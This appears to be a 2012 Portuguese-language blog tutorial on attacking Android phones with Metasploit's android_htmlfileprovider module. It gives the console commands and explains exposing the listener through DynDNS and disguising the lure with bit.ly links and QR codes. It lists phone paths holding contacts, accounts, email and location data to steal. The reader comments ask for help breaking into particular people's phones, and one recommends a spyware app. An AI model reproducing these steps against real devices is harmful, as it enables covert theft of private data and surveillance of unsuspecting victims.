quinta-feira, 8 de novembro de 2012

Hackeando e obtendo informações do SmartPhones com Android no Metasploit

quinta-feira, novembro 08, 2012  , , , , ,  10 comments

Nesse arrigo estaremos abordando uma técnica de "hackear" os dispositivos moveis

hackear o androif
com o sistema operacional Android. Vamos utilizar a ferramente já conhecida por alguns, o Metasploit com um auxiliar de sua biblioteca  que pode ser encontrada no Sistema operacional BackTrack. Isso pode ser possível quando um dispositivo esta conectado em sua rede local, Mas usaremos  o DynDNS que nos da um alcance melhor do ataque, e veremos como ofuscar o endereço através de codigos QR e site que encurtam links como o bit.ly .

Vamos começar!

Roubar arquivos android_htmlfileprovider

 A primeira coisa é começar o msfconsole no terminal do backtrack


  1. root@bt:~# /opt/framework3/msf3/msfconsole
Agora vamos usar um dos módulos auxiliares do Metasploit, que serve exatamente para  o nosso objetivo:
  1. msf > use gather/android_htmlfileprovider
  2. msf auxiliary(android_htmlfileprovider) >
Agora, vamos ver as opções que oferece o módulo...
  1. msf auxiliary(android_htmlfileprovider) > show options
  • FILES (arquivos do Android que queremos roubar) 
  • SRVHOST (IP local que estará a espera de conexões)
  • SRVPORT (A porta que estará a espera de conexões)
  • SSL (ALTERNATIVA - Se queremos usar SSL para negociação da conexão)
  • SSLVersion (Se tiver ativado a opção acima, indique a versão do  SSL )
  • URIPATH (A URI que será utilizada)
No momento , não vamos tocar na opção FILES. Já na opção SRVPORT mudará para 80, uma vez que é a porta http normal, e será mais suspeito se conectar-se a uma outra porta. Além disso URIPATH também vai mudar, que por padrão é uma seqüência aleatória, a vítima será direcionado para a raiz do servidor, faça com a baixo:

  1. msf auxiliary(android_htmlfileprovider) > set SRVPORT 80
  2. SRVPORT => 80
  3. msf auxiliary(android_htmlfileprovider) > set URIPATH /
  4. URIPATH => /
Agora só podemos começar a façanha usando o comando run, e esperar algum dispositivo conectar ao nosso IP ouvinte.

Veja a Imagem abaixo:

Exploit Executado - CLIQUE PARA AMPLIAR
Usando DynDNS para aumentar o alcance

Como dizemos, se fizermos esse ataque só para redes locais (LAN), como smartphones não costumam passar muito tempo conectado a uma rede Wi-Fi que estamos interessados. Mas é possível aumentar essa exploração, para fazer isso, neste caso vamos usar o DynDNS, que é um serviço que fornece o endereçamento dinâmico de domínio tipo site.dyndns *. Org .

Temos que ir no site da  http://dyn.com/ e criar uma conta. Após isso, pode registrar o domínio que escolhemos. Após este iria para as configurações do roteador e indicar o domínio, o nome de usuário e senha, como você pode ver (em outros roteadores pode ser diferente).

CLIQUE PARA AMPLIAR
Devo dizer que DynDNS é um serviço excelente. Depois de configurar o domínio DynDNS só precisa redirecionar corretamente no ip do roteador. Ou seja, no nosso caso, a vítima irá se conectar ao vidasconcurrentes.dyndns.org (na porta 80) e deve ser definida para ir para a porta IP em que ouvimos o exploit.

CLIQUE PARA AMPLIAR


Ofuscando o ataque com códigos QR e bit.ly

Temos tudo para o ataque,  teria que passar a url para as vítimas e esperar por ele para se conectar. O problema é que um estilo vidasconcurrentes.dyndns.org url pode ser bastante suspeito. Neste caso, use um encurtador de URL, usaremos o  bit.ly  ( pode se encontrar vários). 

Finalmente, se quisermos um ataque mais viral, podemos criar um código QR (http://qrcode.kaywa.com/) usando o link  que o encurtador de link do  bit.ly nos deu  , sendo ainda mais difícil de detectar.
O QR vai estar camuflado com o link do Bit, veja o EX :  http://bit.ly/q9wRCW , que redireciona para o domínio criado no DynDNS, o vidasconcurrentes.dyndns.org, que estará com o exploit a escuta.. Veja o Exemplo do QR.

CLIQUE PARA AMPLIAR

Tendo sucesso em sua invasão, basta usar a criatividade para explorar, alguns diretorios do android em especial estará listados a baixo:

Banco de Dados de Contatos

/data/data/com.android.providers.contacts/databases/contacts.db

Banco de Dados do Browser
/data/data/com.android.browser/databases/browser.db

Banco de Dados de Contas
/data/data/com.google.android.googleapps/databases/accounts.db

Banco de Dados de Geolocalização
/data/data/com.android.browser/gears/geolocation.db

Diretório de Banco de Dados do Telefone
/data/data/com.android.providers.telephony/databases/

Banco de Dados de historicos
/data/data/com.google.android.apps.maps/databases/search_history.db

Diretório de Banco de Dados de E-Mail
/data/data/com.google.android.providers.gmail/databases/


A maioria dos aplicativos tem um diretório de bancos de dados, pode-se obter o suficiente de  informação.

10 comentários:

  1. ballack 200920 de novembro de 2013 às 19:11

    fiz o procedimento, mas tenho duvidas, vc pode me ajudar?

    ResponderExcluir
  2. Anônimo23 de novembro de 2013 às 15:59

    Não consigo criar meu host no dyndns eles pedem cartão de credito e só liberam pra eu experimentar um pacote por 15 dias isso esta certo ou eu estou fazendo algo errado


    Att . john

    ResponderExcluir
  3. Anônimo25 de novembro de 2013 às 05:34

    Olá bom dia.
    Amigo quero monitorar as mensagens e envios de arquivos assim como as ligações de feitas por um celular com android é possível?

    ResponderExcluir
    Respostas
    1. Anônimo10 de dezembro de 2013 às 17:46

      Kidlogger é bomzim amigo fácil de configurar e acompanhar pena que o gratuito só ver localizaçã, msgn, ligação e alguns Logs... A versão paga se não me engano ver até tudo que é digitado no site fotos e muitas outras coisas espero ter ajudado.

      Excluir
  4. Anônimo29 de dezembro de 2013 às 10:18

    Boa Tarde Hc Host! Gostaria de saber se eu posso "hackear" um celular L5 com Android para eu poder acessar todos os arquivos e apagar alguns do mesmo.

    Para eu poder acessar o celular específico eu tenho que pegar o IP do celular né?

    Tem como me ajudar por favor?

    Por favor preciso da ajuda do site Urgentemente, pois quero apagar só alguns arquivos do celular específico.

    ResponderExcluir
  5. Anônimo22 de fevereiro de 2014 às 14:55

    Boa noite...
    Eu não tenho o sistema operacional backtrack mas conseguir instalar o Metasploit.
    É possível apenas com ele?

    ResponderExcluir
  6. Unknown24 de fevereiro de 2014 às 16:07

    Amigo estou sendo hackeado como poderia me defender o hacker todo dia apaga miunha agenda do cel, ele tem acesso a tudo, ele sempre manda email pra mim dizendo que ele e o melhor hacker do mundo e que nao tem ninguem pra barrar ele... tem como eu me defender uso um cel granduos sistema android, meu email evandrogpinto@gmail.com

    ResponderExcluir
  7. Anônimo15 de junho de 2014 às 11:24

    Evandro restaura seu celular pelo rad reset e mude a senha de seus email que usa no celular. mas mude a senha antes de reinstalar

    ResponderExcluir
  8. Unknown1 de fevereiro de 2016 às 10:18

    Preciso invadir um celular para apagar um determinado vídeo. Tenho apenas o número da pessoa. Como procedo? Tenho que enviar um link para a pessoa aceitar primeiramente?

    ResponderExcluir

Proibido palavras ofensivas, racistas ou descriminatórias.

[Seu Comentário será liberado no máximo em 24horas]

Assinar: Postar comentários (Atom)